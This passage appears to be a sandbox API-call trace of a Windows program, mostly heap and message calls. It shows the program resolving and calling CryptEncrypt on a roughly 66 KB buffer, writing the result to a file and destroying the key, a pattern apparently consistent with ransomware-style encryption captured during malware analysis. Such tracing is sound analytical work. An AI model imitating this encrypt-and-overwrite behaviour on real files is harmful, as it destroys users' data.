0x2a71908 [0101.514] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0101.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0101.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0101.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0101.514] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0101.514] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.514] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0101.514] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.514] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0101.514] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0101.514] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0101.514] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0101.514] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0101.514] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0101.515] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0101.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0101.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0101.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9be0 [0101.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0101.515] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.515] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0101.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0101.515] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0101.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0101.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0101.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0101.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0101.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0101.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0101.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0101.515] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0101.515] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0101.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0101.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0101.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0101.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0101.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0101.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0101.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0101.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0101.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0101.515] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0101.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0101.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0101.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0101.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0101.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0101.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0101.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0101.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0101.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0101.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0101.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0101.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0101.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0101.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0101.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0101.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0101.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0101.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0101.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0101.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0101.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0101.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0101.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0101.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0101.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0101.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0101.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37d0050 | out: hHeap=0x2af0000) returned 1 [0101.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0101.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0101.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0101.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0101.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0101.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0101.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0101.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0101.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0101.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0101.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0101.518] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0101.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0101.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0101.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0101.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0101.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0101.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0101.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0101.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0101.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0101.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0101.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0101.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0101.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0101.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9e80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0101.582] CryptEncrypt (in: hKey=0x9a42c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x10260, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x10268) returned 1 [0101.582] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.582] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.582] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.611] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.611] CharLowerBuffW (in: lpsz="byte[66152]", cchLength=0xb | out: lpsz="byte[66152]") returned 0xb [0101.611] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.613] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.613] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0101.613] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.613] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0101.614] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.614] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0101.614] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9dd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0101.614] CryptEncrypt (in: hKey=0x9a42c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37d0050*, pdwDataLen=0x8cef60*=0x10260, dwBufLen=0x10268 | out: pbData=0x37d0050*, pdwDataLen=0x8cef60*=0x10268) returned 1 [0101.616] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.616] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.616] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.616] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.616] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.616] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.616] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.616] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0101.616] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.616] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0101.617] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.617] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.617] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0101.617] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0101.617] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0101.617] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0101.617] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0101.617] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0101.617] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.617] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0101.617] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0101.617] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0101.617] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0101.617] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0101.617] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.617] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0101.617] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0101.622] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.622] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.622] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.623] WriteFile (in: hFile=0x458, lpBuffer=0x2a7a130*, nNumberOfBytesToWrite=0x10268, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesWritten=0x8cf5e4*=0x10268, lpOverlapped=0x0) returned 1 [0101.626] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.626] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.626] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0101.626] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0101.626] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0101.626] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0101.626] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0101.626] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0101.626] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0101.626] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0101.626] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0101.626] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0101.626] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0101.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aa9af0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0101.627] CryptDestroyKey (hKey=0x9a42c0) returned 1 [0101.627] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0101.627] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0101.627] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0101.627] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0101.627] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0101.627] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0101.627] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0101.627] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0101.627] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0101.627] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0101.627] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0101.627] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0101.627] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0101.627] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0101.627] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0101.627] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0101.627] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0101.627] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0101.628] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0101.628] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, 